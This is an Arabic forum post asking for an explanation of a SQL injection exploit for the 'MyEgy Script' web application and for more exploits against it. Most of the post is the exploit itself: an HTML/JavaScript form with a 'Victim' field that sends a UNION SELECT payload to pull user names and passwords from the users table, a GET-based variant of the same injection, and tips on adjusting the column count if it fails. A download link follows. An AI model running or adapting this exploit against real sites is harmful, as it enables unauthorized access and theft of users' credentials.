اسم الثغرة Myegy Script (display.php) Remote SQL Injection Vulnerability وجدتها فى احد المواقع ولكن اريد احد يشرحهالى
واى حد عنده ثغرة لهذا الاسكربت المذكور فى الثغرة ما يبخلش علبا
كود PHP:
<html>
<!--
Script Name :MyEgy Script
Authur : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email : K4rar@yahoo.com & ahmed_Sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
.style1 {
text-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
for(var n =1;n<co;n++){
if(tmp){
var tmp = tmp+n+",";
}else{
var tmp = n+",";
}
}
tmp =tmp.replace(5,"concat(name,0x3a,password)");
********.f0.action=si+'/';
********.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
********.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi & Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="http://localhost/myegy"></p>
<p class="style1">Columns Number : <input name="cl" type="text" style="width: 27px; height: 22px" value="8"></p>
<input name="c" type="hidden" value="-1">
<div class="style1">
<input name="Submit1" type="submit" value="submit" style="width: 72px" onclick="doit(********.f0.site.value,********.f0.cl.value);"></div>
</form>
</body>
</html
ودا رابط تحميل ملف التكست عشان لو فيه اكواد ممنوعه فى المنتدى
http://www.mediafire.com/?564xbutz34c81b1
>
hv[, hp] dshu]kn tn i`i hgeyvm